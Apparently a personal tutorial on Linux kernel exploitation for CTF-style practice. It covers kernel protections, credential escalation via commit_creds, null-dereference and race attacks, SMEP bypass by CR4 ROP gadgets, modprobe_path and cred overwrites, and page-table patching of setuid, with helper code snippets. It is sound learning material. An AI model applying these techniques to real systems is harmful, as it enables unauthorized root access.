This will be my kernel exploitation notes. This also includes a set of code snippets & helper scripts to make exploitation faster in future.
What you will find here:
- My notes (below)
- Helpers & Code snippets
- Kernel Challenges I authored & writeups
- My kernel challenges writeups
I'll try to keep this as simple as possible, in case anyone needs it in the future. However, it assumes a minimum knowledge of binary exploitation (stack, heap, protections...), so user-land exploitation will not be explained here. This is meant to introduce kernel exploitation & dive into it.
I'll be updating this as I make progress. I may mess up sometimes or get some details wrong, and I'll fix that when I find out about it. If you find something weird or wrong, please let me know and I'll fix it or add more details if needed; it'll be much appreciated.
What we'll go through:
- Resources
- What's a kernel?
- User space VS Kernel space
- Kernel Protections
- From user to kernel & vice versa
- Kernel Credentials
- How to exploit?
- Attacking Techniques
- EN - Linux Kernel Exploitation - Patrick Biernat
- Hello, kernel: Exploiting an intentionally vulnerable Linux driver
- Practical SMEP bypass techniques on Linux - Vitaly Nikolenko
- Learning Linux Kernel Exploitation - Part 1
- Control Registers
- Meltdown Vulnerability
- Kernel Exploitation Introduction, Techniques, Tools & Writeups by smallkirby
- Writeup - OverTheWire Advent Bonanza 2018 - Snow Hammer
- Writeup - hxp 2018 - Green Computing
More resources will be included below.
The kernel connects hardware with software: it provides an abstraction layer that lets applications (executing in userland) interact with the hardware. It's basically the brain of the OS.
Kernel space is what we call Ring 0 (see below for reference). It has access to everything, BUT the hard way: no easy access/abstractions. Basically, any privilege escalation exploit related to the Linux kernel, or "jailbreaking" for iOS & consoles, involves exploiting kernel code to gain a higher privilege and then returning to user space with the new privilege.
User space is what we are in all of the time. Every single app you run or use (doesn't matter which permission you used to run it) will be in user space. This is the last ring, which is the least privileged one.
Now, how do these spaces connect? Interrupts.
When we say interrupts, there is a large list of possible interrupts that may happen. For example, pressing Ctrl+C (which ends up delivering a SIGINT) would result in an interrupt, receiving a network packet would result in an interrupt...
There are also system calls (see syscall.sh for a list). Each syscall transfers control to the kernel too, much like an interrupt.
The kernel will handle each interrupt accordingly. For example, for an open syscall, it'll look up the file, check access permissions, open it & return a file descriptor. (Not many details, just an abstract view for now.)
Now, think about hardware: there are lots of brands, versions & models of any given device, say a keyboard. The kernel handles the communication with this device, yes, but how does it know how to communicate with so many devices and versions?
Here we introduce modules. What if you want to extend your OS, or design a new feature that needs kernel access? Of course, you could write your own kernel, but that's not a very friendly solution. We have modules to save us! A module is a piece of code that can be loaded into & unloaded from the kernel, and that can handle specific interrupts. We can use the commands lsmod, rmmod & insmod to manage our modules (loading & unloading need root permissions).
A module should be running in ring 1/2 but those levels are merged with ring 0, so for linux kernel, our modules will be running in kernel level.
In Linux, a device (for example, your memory or storage device) is exposed as a virtual file for you to communicate with, located under /dev; the device's module is responsible for that! Of course, a module doesn't have to create a device file under /dev: it can, for example, add a new syscall or something else!
When we say User Space (or user land), we think stack, heap, ASLR, RELRO, PIE, NX... Kernel space is a separate memory space from userland: it has its own stack, heap, memory address range... There are also different types of protections.
Base knowledge:
We have 2 different spaces, kernel space & user space. User space contains user app's code + data (memory), Kernel space contains kernel code & memory.
- Control Registers:
A control register is used to control the behavior of the CPU. On x86-64 CPUs, one of these control registers is called CR4. For example, if bit 20 is set to 1, SMEP is enabled; bit 21 does the same for SMAP. More about this register can be found here.
- SMEP: Supervisor Mode Execution Protection
This protection basically prevents the execution of code from user space when we are in kernel context.
- SMAP: Supervisor Mode Access Protection
This protection prevents the kernel from reading or writing user-space memory (other than through some specific methods that are meant for that).
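To make the bit positions concrete, here is a minimal sketch that checks and clears the SMEP/SMAP bits in a CR4 value you read from a debugger. The function and macro names are my own, not kernel identifiers.

```c
#include <stdint.h>

#define CR4_SMEP (1ULL << 20) /* Supervisor Mode Execution Protection */
#define CR4_SMAP (1ULL << 21) /* Supervisor Mode Access Protection */

/* Returns 1 when the SMEP bit is set in a CR4 value. */
int cr4_smep_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMEP) != 0;
}

/* Returns 1 when the SMAP bit is set in a CR4 value. */
int cr4_smap_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMAP) != 0;
}

/* Returns the same CR4 value with both protections cleared. */
uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(CR4_SMEP | CR4_SMAP);
}
```

For instance, 0x1407e0 has bit 20 set (SMEP on, SMAP off), and clearing it gives 0x407e0.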
- Kallsyms
This is a file located at /proc/kallsyms.
Now, the kernel can be considered like any other ELF binary: it has code, it has functions, it has symbols. This file gives us all of the kernel symbols with their associated addresses. It's like /proc/self/maps but with more details.
However, this file is restricted on some kernels, returning 0 for symbol addresses to low-privileged users. Always check in case it's exposed, you never know.
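As a rough helper, the sketch below looks a symbol up in a kallsyms-formatted file (lines of the form "address type name"). The function names are mine. A result of 0 means either "not found" or "addresses are hidden from this user", so treat it as a failure in both cases.

```c
#include <stdio.h>
#include <string.h>

/* Parses one "address type name" line; returns 1 on success, 0 otherwise. */
int parse_kallsyms_line(const char *line, unsigned long long *addr,
                        char *type, char name[128])
{
    return sscanf(line, "%llx %c %127s", addr, type, name) == 3;
}

/* Scans a kallsyms-formatted file for a symbol; returns its address or 0. */
unsigned long long kallsyms_lookup(const char *path, const char *symbol)
{
    FILE *f = fopen(path, "r");
    char line[512], name[128], type;
    unsigned long long addr, found = 0;

    if (!f)
        return 0;
    while (fgets(line, sizeof line, f)) {
        if (parse_kallsyms_line(line, &addr, &type, name) &&
            strcmp(name, symbol) == 0) {
            found = addr;
            break;
        }
    }
    fclose(f);
    return found;
}
```

Typical use would be kallsyms_lookup("/proc/kallsyms", "commit_creds").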
- mmap_min_addr
This protection sets a minimum address that mmap will accept from user space, protecting against NULL pointer dereferences. When the kernel dereferences a NULL (or near-NULL) pointer, it ends up accessing the lowest range of addresses, so preventing a user-space application from mapping that range keeps an attacker from controlling what the kernel finds there.
- KASLR
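This is similar to ASLR for userspace: the kernel's base address is randomized at each boot, so symbol addresses have to be leaked before they can be used.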
- Kernel Page-Table Isolation (KPTI)
This protection was introduced after Meltdown vulnerability, which used speculative execution added in CPUs to read protected memory addresses, such as kernel space addresses. The vulnerability uses a time-based attack using CPU cache to detect whether or not an instruction has been executed, and since CPUs did not implement checks on protected addresses in speculative execution, an attacker can successfully execute read operations from a protected memory address. For more on this, feel free to check wiki page or this youtube video explaining both Meltdown & Spectre vulnerabilities.
In order to fix these vulnerabilities, CPU manufacturers couldn't change the design of already existing CPUs; therefore, a software fix had to be created, which led to the introduction of a new protection in the Linux kernel (& other OS kernels) called Kernel Page-Table Isolation (KPTI), which consists of separating the page tables used in kernel mode & in user mode.
Starting off with, what's a memory page? Basically, memory is divided into fixed-size pages, and page tables map each virtual memory page of a process to a physical memory page.
Previously, both the kernel memory space & the user memory space were mapped in the same set of page tables, which speculative execution could abuse to read kernel memory from user mode. With KPTI, kernel mode & user mode use different sets of page tables: the kernel-mode set includes both user memory space & kernel memory space, while the user-mode set includes only the user memory space & a small section of kernel memory space.
This separation prevents unauthorized access to protected memory in user mode execution.
We'll take a system call as an example. The moment you execute syscall (or int 0x80 if you're on x86), an interrupt will take place. The kernel will handle this interrupt, for example by having a module handle that specific call.
The kernel will save the user space context (RIP, stack address, flags...) then switch to a kernel context.
Returning now from kernel to a user context, the kernel needs to restore the user context then jump back to where it stopped. To restore the context, we have 2 steps:
- swapgs: This is for 64-bit architecture. This instruction is intended to set up context switching, or more particularly to switch register context from user land to kernel land and vice versa. Specifically, swapgs swaps the value of the gs register so that it refers to either a memory location in the running application, or a location in the kernel's space. This is a requirement for switching contexts!
- iretq/sysretq: Either of these can be used to perform the actual context switch between user land and kernel land.
  - iretq requires five user land register values in this order: rip, cs, rflags, sp, ss. So, we have to push them to the stack in the reverse order before executing.
  - sysretq, when executed, moves the value in rcx to rip, which means we have to set up our return address there. Additionally, it moves r11 to rflags, which may require additional handling. Finally, sysretq expects the value in rip to be in canonical form, which basically means that bits 48 through 63 of that value must be identical to bit 47 (compare sign extension). If that's not the case, we run into a general protection fault! The sysret instruction seems to have stricter constraints but also has fewer registers involved and generally seems to be faster when executed.
There is also the option to use the sysexit instruction (doc), which takes the RDX value & sets it as RIP, and the RCX value & sets it as RSP.
The use of sysexit is linked to Fast System Calls, which simplifies the process a lot and requires less work! This will also work on both x86 & x86-64 architectures. For Fast System Calls, AMD offers the SYSCALL/SYSRET pair, while Intel offers SYSENTER/SYSEXIT.
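The two constraints above (the iretq frame order and the canonical-address rule for sysretq) can be sketched in plain C. This is only an illustration: the struct and function names are mine, and the register values you pass in are the ones you saved before entering the kernel.

```c
#include <stddef.h>
#include <stdint.h>

/* Layout iretq pops from the stack, lowest address first. */
struct iret_frame {
    uint64_t rip;
    uint64_t cs;
    uint64_t rflags;
    uint64_t rsp;
    uint64_t ss;
};

/* Fills a frame so that iretq resumes user code at `rip`. */
void fill_iret_frame(struct iret_frame *f, uint64_t rip, uint64_t cs,
                     uint64_t rflags, uint64_t rsp, uint64_t ss)
{
    f->rip = rip;
    f->cs = cs;
    f->rflags = rflags;
    f->rsp = rsp;
    f->ss = ss;
}

/* sysretq needs a canonical rip: bits 48..63 must all equal bit 47. */
int is_canonical(uint64_t addr)
{
    uint64_t top = addr >> 47; /* bits 47..63, 17 bits in total */
    return top == 0 || top == 0x1ffff;
}
```

In a ROP chain, the five frame values simply follow the address of the iretq gadget, in the struct's order.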
Okay, so our main goal is to escalate our privileges, so we'll need to go through this. In Linux, every thread has a task_struct structure containing its information, including the thread's credentials: that structure holds a pointer to a struct cred (Reference: task_struct).
So, if we can change our current thread's cred structure, we can escalate our privileges! Luckily, there are 2 kernel functions that can help with this:
- prepare_kernel_cred: Calling prepare_kernel_cred(NULL) will create a new structure for us with root privileges! Ain't that something? (On recent kernels, 6.2 and later as far as I know, a NULL argument is no longer accepted and &init_task has to be passed instead.)
- commit_creds: This function takes a cred structure & applies it to our current thread, so basically we'll be calling commit_creds(prepare_kernel_cred(NULL)) to become root.
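On 32-bit x86, both of these functions use a fastcall-like calling convention, meaning parameters are passed through eax, edx, ecx. On x86-64, they follow the usual System V convention, so the first parameters go through rdi, rsi, rdx.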
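Here is a small sketch of the commit_creds(prepare_kernel_cred(NULL)) call expressed through function pointers, which is how a payload would usually reach the two functions once their addresses are known. Everything prefixed with toy_ is a user-space stand-in I made up so the call order can be tried outside a kernel; the struct cred here is NOT the kernel's layout.

```c
#include <stddef.h>

struct cred { unsigned int uid; }; /* toy stand-in, not the kernel's struct */

typedef struct cred *(*prepare_kernel_cred_t)(void *daemon);
typedef int (*commit_creds_t)(struct cred *new_cred);

/* Performs commit_creds(prepare_kernel_cred(NULL)) through two pointers. */
int escalate(prepare_kernel_cred_t prepare, commit_creds_t commit)
{
    struct cred *root = prepare(NULL);

    if (!root)
        return -1; /* never hand a NULL cred to commit_creds */
    return commit(root);
}

/* User-space stand-ins (hypothetical) mimicking the two kernel functions. */
static struct cred toy_root = { 0 };
static struct cred *toy_current = NULL;

struct cred *toy_prepare_kernel_cred(void *daemon)
{
    (void)daemon;
    return &toy_root;
}

int toy_commit_creds(struct cred *new_cred)
{
    toy_current = new_cred;
    return 0;
}

struct cred *toy_current_cred(void)
{
    return toy_current;
}
```

In a real payload, the two pointers would be built from addresses found in /proc/kallsyms or through a leak, for example (commit_creds_t)address.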
This is a basic section; we'll go into more detail later on with more examples. What we'll mainly be doing is interacting with Linux modules. A module can create a device file located in /dev, add a new syscall or register a character device. There might be some other ways, since you're, like, at kernel level?
For a device file, you can simply open the file & interact with it (R/W):
dev = open(MOD_DEV, O_RDWR);
read(dev, buff, size);
write(dev, buff, size);
Or if it's a syscall, you should know what you can do already since you're here.
Last, you can use ioctl to communicate with the module. We'll get more info on this later.
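A minimal sketch of these interactions with error handling, assuming the module exposes a device file. The helper names are mine, and the ioctl request number you pass is whatever the target module defines.

```c
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <unistd.h>

/* Opens a device file and writes `len` bytes; returns bytes written or -1. */
ssize_t dev_write(const char *path, const void *buf, size_t len)
{
    int fd = open(path, O_RDWR);
    ssize_t n;

    if (fd < 0)
        return -1;
    n = write(fd, buf, len);
    close(fd);
    return n;
}

/* Sends one ioctl request to a device file; returns ioctl's result or -1. */
int dev_ioctl(const char *path, unsigned long request, void *arg)
{
    int fd = open(path, O_RDWR);
    int ret;

    if (fd < 0)
        return -1;
    ret = ioctl(fd, request, arg);
    close(fd);
    return ret;
}
```

In an actual exploit you would usually keep the file descriptor open across calls instead of reopening the device each time.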
- Buffer overflow
A buffer overflow vulnerability in kernel land is similar to user land: we might face a canary if enabled, which we will have to leak, and eventually we can do a ROP chain (discussed below)... There is not much to talk about here.
- Null pointer dereferences
On today's systems, there's a minimum value for the addresses that can be mmapped by non-root users. To view this on your system, you can run cat /proc/sys/vm/mmap_min_addr
So what's this exploit about?
If we have the following code:
#include <stddef.h>

struct something {
    int (*fn_ptr)(void *param);
};
struct something *x; /* global, never assigned: starts out as NULL */

int main(void)
{
    return x->fn_ptr(NULL);
}
As an initial value, x is NULL, which means 0, so x->fn_ptr is read from address 0x0. This would result in a memory error, but what if we can allocate a memory chunk starting at address 0x0? The above code would actually work if we put a proper value there!
So what we can do is
int main(void)
{
    /* needs <sys/mman.h>; only succeeds when mmap_min_addr is 0 */
    mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
    unsigned long *p = 0;
    p[0] = 0xdeadbeef; /* becomes the value read as x->fn_ptr */
    return x->fn_ptr(NULL);
}
And this will call 0xdeadbeef for us! Of course, the mmap call won't work if your /proc/sys/vm/mmap_min_addr is not 0, and that's one of the protections we talked about earlier.
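Before relying on this, it helps to check whether page 0 can be mapped at all. A minimal sketch follows (the helper names are mine). Note that mmap succeeding at address 0 returns 0, so the result has to be compared against MAP_FAILED rather than NULL.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <sys/mman.h>

/* Reads /proc/sys/vm/mmap_min_addr; returns -1 if it cannot be read. */
long read_mmap_min_addr(void)
{
    long value = -1;
    FILE *f = fopen("/proc/sys/vm/mmap_min_addr", "r");

    if (!f)
        return -1;
    if (fscanf(f, "%ld", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}

/* Tries to map one page at address 0; returns 1 on success, 0 on failure. */
int try_map_null_page(void)
{
    void *p = mmap((void *)0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);

    if (p == MAP_FAILED)
        return 0;
    munmap(p, 4096); /* this sketch only probes, it does not keep the page */
    return 1;
}
```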
- Concurrent execution
In user-space applications, when we write a function & do not use any sort of concurrent execution (e.g. threads), we should be safe from concurrency attacks.
Now, looking into kernel-space, things are a bit different. Let's suppose we have this kernel module:
struct module_struct {
ssize_t (*fn_pointer)();
} global_instance;
static ssize_t some_valid_function()
{
// ...
}
static ssize_t module_read(struct file *f, char __user *buf, size_t len, loff_t *off)
{
return (global_instance.fn_pointer)();
}
static ssize_t module_write(struct file *f, const char __user *buf,size_t len, loff_t *off)
{
// ...
global_instance.fn_pointer = 0;
// ...
global_instance.fn_pointer = &some_valid_function;
}
At first glance, this code might seem safe. However, once you realize that calls to module_read & module_write from user-space programs can be executed in parallel, this opens the door to a race that leads to a null pointer dereference.
To simplify things, we'll use a null pointer dereference & consider that we are able to allocate address 0x0 (mmap_min_addr = 0).
How can we attack this piece of code? Simply run multiple threads or use a fork: one will call module_write & the other will call module_read. Then hope that the gap between global_instance.fn_pointer = 0; & global_instance.fn_pointer = &some_valid_function; takes long enough to run, to give you more chances to call fn_pointer while it's still NULL.
Example using fork:
int main(void)
{
    /* open_dev(), buff and size are assumed to be defined elsewhere */
    char shellcode[] = "...";
    char te[5];
    mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0);
    memcpy(0, shellcode, sizeof(shellcode));
    int dev = open_dev();
    if (fork() == 0)
    {
        read(dev, te, 5);
        // Child becomes root if we are lucky enough.
    }
    else
    {
        write(dev, buff, size);
    }
    return 0;
}
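To get a feel for how wide such a window is, here is a user-space simulation of the race, with no kernel module involved: a child process keeps doing the "set to 0, then set to valid" sequence on a shared slot while the parent counts how often it sees 0. The function name and the shared-memory setup are my own; the count depends on timing and can be 0 on a single core.

```c
#define _DEFAULT_SOURCE
#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns how many times the reader saw the slot while it was 0, or -1. */
long count_null_observations(long iterations)
{
    void *mem = mmap(NULL, sizeof(uintptr_t), PROT_READ | PROT_WRITE,
                     MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    volatile uintptr_t *slot;
    long hits = 0;
    pid_t pid;

    if (mem == MAP_FAILED)
        return -1;
    slot = mem;
    *slot = 1; /* stands for "points to some_valid_function" */

    pid = fork();
    if (pid < 0) {
        munmap(mem, sizeof(uintptr_t));
        return -1;
    }
    if (pid == 0) {
        /* Writer: same two assignments as module_write. */
        for (long i = 0; i < iterations; i++) {
            *slot = 0;
            *slot = 1;
        }
        _exit(0);
    }
    /* Reader: polls until the writer exits, like repeated module_read calls. */
    while (waitpid(pid, NULL, WNOHANG) == 0) {
        if (*slot == 0)
            hits++;
    }
    munmap(mem, sizeof(uintptr_t));
    return hits;
}
```

Against a real module, each hit would be a read() that dereferenced the NULL pointer.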
- Bypassing SMEP
To check for SMEP, we can look for the smep flag in /proc/cpuinfo. We can run cat /proc/cpuinfo | grep smep to get direct results.
As we said earlier about control registers, they are simply registers. This means we can change their values using assembly instructions. For example, if CR4 currently holds 0x1407e0, loading 0x407e0 into a register and executing mov cr4, rax will disable SMEP for us! What's important here is to use a value with bit 20 set to 0. This value can be a constant; you can get the current one by debugging.
How to do that now? Well, since we cannot execute user-space code, it'll be either a shellcode in kernel-space OR our good old friend, ROP chains.
- ROP Chains
A ROP chain in kernel-space is the same as what we are used to in user land. We have a bzImage or a vmlinuz, which contains the compressed Linux kernel. To search for ROP gadgets, we will have to decompress it. You can find here a useful bash script to automatically decompress it. Usage is as follows:
./extract-image.sh ./bzImage > vmlinux
Now, examining our vmlinux file, we find it's an ELF & we can run ropper to find ROP gadgets!
Going back to bypassing SMEP, we might stumble upon these 2 gadgets:
mov cr4, eax; pop ebp; ret;
pop eax; ret;
which, if you are already familiar with ROP chains in user land, you would know are enough to change the value of the CR4 register & therefore disable SMEP.
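A sketch of how those two gadgets would be laid out on the stack, using their 64-bit forms (pop rax; ret and mov cr4, rax; pop rbp; ret). The gadget addresses are parameters because they depend on your vmlinux; the function name is mine.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Writes the chain:
 *   pop rax; ret              <- loads the new CR4 value
 *   new CR4 value
 *   mov cr4, rax; pop rbp; ret
 *   dummy value for pop rbp
 *   address to continue at
 * Returns the number of 8-byte slots written.
 */
size_t build_cr4_chain(uint64_t *chain, uint64_t pop_rax_ret,
                       uint64_t mov_cr4_rax_pop_rbp_ret,
                       uint64_t new_cr4, uint64_t next_rip)
{
    size_t i = 0;

    chain[i++] = pop_rax_ret;
    chain[i++] = new_cr4;
    chain[i++] = mov_cr4_rax_pop_rbp_ret;
    chain[i++] = 0; /* consumed by pop rbp */
    chain[i++] = next_rip;
    return i;
}
```

The resulting array is what overwrites the saved return address and the stack slots after it.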
- Arbitrary Write
Let's suppose we currently have an arb. write vulnerability, how can we make use of this?
Starting off with modprobe_path. What happens when you run a file with unknown magic bytes in Linux? Just to be clear here, magic bytes are the first few bytes of a file; they are used to identify the format of the file (what the "extension" would tell you if you are a Windows user) and how it should be executed. Now, if these magic bytes are unknown, the Linux kernel runs a program called modprobe in an attempt to load a module that knows how to handle this file.
Luckily for us, the kernel stores the path of modprobe in a memory variable called modprobe_path! On top of this, modprobe is executed as root! We cannot ask for more at this point.
So, the strategy is overwriting modprobe_path with the path of a controlled binary/shell script that'll give us root privileges later on. Simple, right?
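The user-space side of this technique can be sketched as follows: create the helper script that modprobe_path will point to, plus a trigger file whose magic bytes match no known format. The file paths, the helper's content and the function names are placeholders of mine; the arbitrary write itself is not shown.

```c
#include <stdio.h>
#include <sys/stat.h>

/* Writes `len` bytes to `path` and makes it executable; 0 on success. */
static int write_executable(const char *path, const void *content, size_t len)
{
    FILE *f = fopen(path, "wb");
    size_t written;

    if (!f)
        return -1;
    written = fwrite(content, 1, len, f);
    if (fclose(f) != 0 || written != len)
        return -1;
    return chmod(path, 0755);
}

/* Creates the helper script and a trigger file with unknown magic bytes. */
int prepare_modprobe_files(const char *helper_path, const char *trigger_path)
{
    /* Placeholder payload: whatever you want executed as root. */
    static const char helper[] = "#!/bin/sh\nid > /tmp/modprobe_helper_ran\n";
    static const unsigned char unknown_magic[4] = { 0xff, 0xff, 0xff, 0xff };

    if (write_executable(helper_path, helper, sizeof helper - 1) != 0)
        return -1;
    return write_executable(trigger_path, unknown_magic, sizeof unknown_magic);
}
```

Once modprobe_path holds helper_path, executing the trigger file (the exec itself fails, which is expected) should make the kernel run the helper as root.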
A much more detailed doc is kernelpwn by smallkirby, which is definitely worth looking at! (It has lots of other interesting stuff worth checking too.)
One important condition for this technique to work is that CONFIG_STATIC_USERMODEHELPER must not be defined (when building the kernel). That option hard-codes the path of the helper program that gets executed: the variable modprobe_path will still exist, but overwriting it will be useless! In order to verify whether it's defined or not, we can execute the following:
/ # cat /proc/kallsyms | grep call_usermodehelper_setup
ffffffff810c8c80 T call_usermodehelper_setup
ffffffff82458118 r __ksymtab_call_usermodehelper_setup
ffffffff82477e3d r __kstrtab_call_usermodehelper_setup
ffffffff8247c3c4 r __kstrtabns_call_usermodehelper_setup
The above is the case when CONFIG_STATIC_USERMODEHELPER is defined. Another method to verify would be checking the disassembly of call_usermodehelper_setup. For more details check this out (by smallkirby).
Another way to gain root would be overwriting the cred structure of the current thread. A good reference for this is this writeup.
Basically, the Linux kernel keeps track of each process's credentials in a struct containing the task's uid & gid. Overwriting these with 0 will give us root. This technique, however, requires a memory read to find the cred structure of the current process in memory.
You can find the structure definition here; this is an old version and only used as an example.
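To visualize what has to be overwritten, here is a simplified view of the beginning of struct cred. This layout is an assumption on my side: it matches older kernels built without credential debugging, so always check the definition for your target version. The names cred_ids and zero_cred_ids are mine.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed start of struct cred on older kernels (no debug fields). */
struct cred_ids {
    int32_t  usage; /* reference count, must be left untouched */
    uint32_t uid;
    uint32_t gid;
    uint32_t suid;
    uint32_t sgid;
    uint32_t euid;
    uint32_t egid;
    uint32_t fsuid;
    uint32_t fsgid;
};

/* Zeroes every id field, which is what the arbitrary write has to achieve. */
void zero_cred_ids(struct cred_ids *c)
{
    c->uid = c->gid = 0;
    c->suid = c->sgid = 0;
    c->euid = c->egid = 0;
    c->fsuid = c->fsgid = 0;
}
```

With this layout, the write covers 32 bytes starting 4 bytes into the structure.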
Another technique is changing the kernel's code! But you might ask, shouldn't the kernel code be in an R-X memory page? Right, and we will change that!
Our first option is changing the CR0 register: by setting bit 16 (the Write Protect bit) to 0, we become able to write to read-only pages when we are in kernel mode. Another option is to update the page permissions; one great writeup that'll guide us through this is OverTheWire Advent Bonanza 2018 - Snow Hammer.
Let's take an example: we will try to change the code of the __sys_setuid function located at 0xffffffff81031f5e.
First, we need to understand how pages are managed by the kernel. We start with the Page Map Level 4 table; we can find the physical address of this structure by inspecting the CR3 register.
Now, how can we access this physical memory? We can make use of qemu's monitor to dump the physical memory into a file. We can do so by adding -monitor tcp::5555,server,nowait to qemu's args & later connecting to the specified port, for example with telnet.
After connecting, we can view registers (or can use gdb for this too) & save the physical memory:
(qemu) pmemsave 0 0x8000000 memdump
(qemu) info registers
CR0=80050033 CR2=0000000000dc57b8 CR3=000000000775a000 CR4=000006b0
We can now view the physical memory at 0x000000000775a000; this is the Page Map Level 4 table.
$ xxd -e -g8 -c8 -a -s 0x775a000 -l 0x1000 memdump
0775a000: 8000000007745067 gPt.....
0775a008: 0000000000000000 ........
*
0775a7f8: 8000000007771067 g.w.....
0775a800: 0000000000000000 ........
*
0775a880: 0000000001b47067 gp......
0775a888: 0000000000000000 ........
*
0775ac90: 0000000000080067 g.......
0775ac98: 0000000000000000 ........
*
0775aea0: 0000000006370067 g.7.....
0775aea8: 0000000000000000 ........
*
0775afe0: 0000000006b6f067 g.......
0775afe8: 0000000000000000 ........
0775aff0: 0000000000000000 ........
0775aff8: 0000000001a16067 g`......
Examining the address we are looking for now:
0xffffffff81031f5e = 0b 1111111111111111 111111111 111111110 000001000 000110001 111101011110
                        sign extension   PML4      PML3      PD        PT        offset
We have our PML4 index "111111111" = 511; multiplied by the entry size 8, that puts our entry at offset 0xff8. This gives us 0775aff8: 0000000001a16067, which holds a physical address. The 0x67 at the end are flags we can ignore.
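The splitting done by hand above can be double-checked with a few shifts. A minimal sketch for 4-level paging (the struct and function names are mine; pdpt is what these notes call PML3):

```c
#include <stdint.h>

struct va_parts {
    unsigned pml4;   /* bits 39..47 */
    unsigned pdpt;   /* bits 30..38 */
    unsigned pd;     /* bits 21..29 */
    unsigned pt;     /* bits 12..20 */
    unsigned offset; /* bits 0..11 */
};

/* Splits a virtual address into its four table indices and page offset. */
struct va_parts split_va(uint64_t va)
{
    struct va_parts p;

    p.pml4 = (unsigned)((va >> 39) & 0x1ff);
    p.pdpt = (unsigned)((va >> 30) & 0x1ff);
    p.pd = (unsigned)((va >> 21) & 0x1ff);
    p.pt = (unsigned)((va >> 12) & 0x1ff);
    p.offset = (unsigned)(va & 0xfff);
    return p;
}

/* Byte offset of an entry inside its 4 KiB table (8 bytes per entry). */
unsigned entry_offset(unsigned index)
{
    return index * 8;
}
```

For 0xffffffff81031f5e this gives indices 511, 510, 8 and 49, with a page offset of 0xf5e.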
Continuing, we examine the physical address 0x01a16000 (the entry with its flag bits masked off), which contains the Page Map Level 3 table:
$ xxd -e -g8 -c8 -a -s 0x0000000001a16000 -l 0x1000 memdump
01a16000: 0000000000000000 ........
*
01a16ff0: 0000000001a17063 cp......
01a16ff8: 0000000001a18067 g.......
After calculating the offset (0xff0), we get 01a16ff0: 0000000001a17063; same as earlier, 0x63 are flags.
Now, we have the next-level table (the page directory) at address 0x01a17000. We can examine this physical address:
$ xxd -e -g8 -c8 -a -s 0x0000000001a17000 -l 0x1000 memdump
01a17000: 0000000000000000 ........
*
01a17040: 00000000010001e1 ........
01a17048: 00000000012001e1 .. .....
01a17050: 00000000014001e1 ..@.....
01a17058: 0000000007869163 c.......
01a17060: 80000000018001e1 ........
01a17068: 0000000007868063 c.......
01a17070: 0000000000000000 ........
*
01a17ff8: 0000000000000000 ........
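Same as earlier, we calculate our offset (0b000001000 * 8 = 0x40), which gives us 01a17040: 00000000010001e1. This value contains our page flags! Bit 7 (0x80) is set in it, which marks a 2 MiB page, so the walk stops here: this entry maps our address directly and there is no further table to follow.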
Now, we have to find the virtual address that points to this physical address. We can examine info tlb in the qemu monitor to identify the base virtual address that's mapped to the table entry, in our case 0xffffffff81a17000.
We can also confirm this in gef by running xinfo:
gef> xinfo 0xffffffff81a17000
---------------------------------------------------------------- xinfo: 0xffffffff81a17000 ----------------------------------------------------------------
Virtual address start-end Physical address start-end Total size Page size Count Flags
0xffffffff81a00000-0xffffffff81c00000 0x0000000001a00000-0x0000000001c00000 0x200000 0x1000 512 [RW- KERN ACCESSED DIRTY GLOBAL]
Offset (from virt mapped): 0xffffffff81a00000 + 0x17000
Offset (from phys mapped): 0x1a00000 + 0x17000
Back to the 00000000010001e1 we found; in binary format, below are some of its flags:
0b1000000000000000111100001
                        |||_ Present bit
                        ||__ Writeable flag (we will flip this)
                        |___ User-Accessible flag
And this is a RW section!
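The same flag reading, and the flip we want, in a few lines of C. The macro and function names are mine; the bit positions are the standard x86-64 page-table entry flags.

```c
#include <stdint.h>

#define PTE_PRESENT  (1ULL << 0)
#define PTE_WRITABLE (1ULL << 1)
#define PTE_USER     (1ULL << 2)
#define PTE_HUGE     (1ULL << 7) /* in a page-directory entry: 2 MiB page */

/* Returns 1 when `flag` is set in a page-table entry. */
int entry_has(uint64_t entry, uint64_t flag)
{
    return (entry & flag) != 0;
}

/* Returns the entry with the writable bit set (the value we want to write). */
uint64_t entry_make_writable(uint64_t entry)
{
    return entry | PTE_WRITABLE;
}
```

For the entry 0x10001e1, the new value to write is 0x10001e3.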
After changing the .text segment to RWX, we will either write a shellcode or patch an existing function. An example of a patch we can do is to change the setuid handler. We can see the setuid code below:
long __sys_setuid(uid_t uid)
{
[...]
new = prepare_creds();
[...]
return commit_creds(new);
}
One potential patch is to change prepare_creds to prepare_kernel_cred, so that root credentials get passed to commit_creds.
Let's take an example:
0xffffffff81031f5e: __sys_setuid
0xffffffff81039cab: prepare_creds
0xffffffff81039ea6: prepare_kernel_cred
Examining the assembly:
gef> x/20i 0xffffffff81031f5e
0xffffffff81031f5e: cmp edi,0xffffffff
0xffffffff81031f61: mov rax,0xffffffffffffffea
0xffffffff81031f68: je 0xffffffff81032016
0xffffffff81031f6e: push r12
0xffffffff81031f70: push rbp
0xffffffff81031f71: mov ebp,edi
0xffffffff81031f73: push rbx
0xffffffff81031f74: push rcx
0xffffffff81031f75: call 0xffffffff81039cab
0xffffffff81031f7a: mov rbx,rax
We are interested in the call 0xffffffff81039cab instruction: patching it to call 0xffffffff81039ea6, which only takes a 16-bit (2-byte) write since just the low two bytes of the call's displacement change, is enough to give us root when executing the setuid syscall.
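The bytes to write can be computed from the addresses above: a near call is the opcode 0xe8 followed by a 32-bit displacement relative to the end of the 5-byte instruction. A small sketch (function names are mine):

```c
#include <stdint.h>

/* Displacement for a 5-byte `call rel32` located at call_addr. */
int32_t call_rel32(uint64_t call_addr, uint64_t target)
{
    return (int32_t)(target - (call_addr + 5));
}

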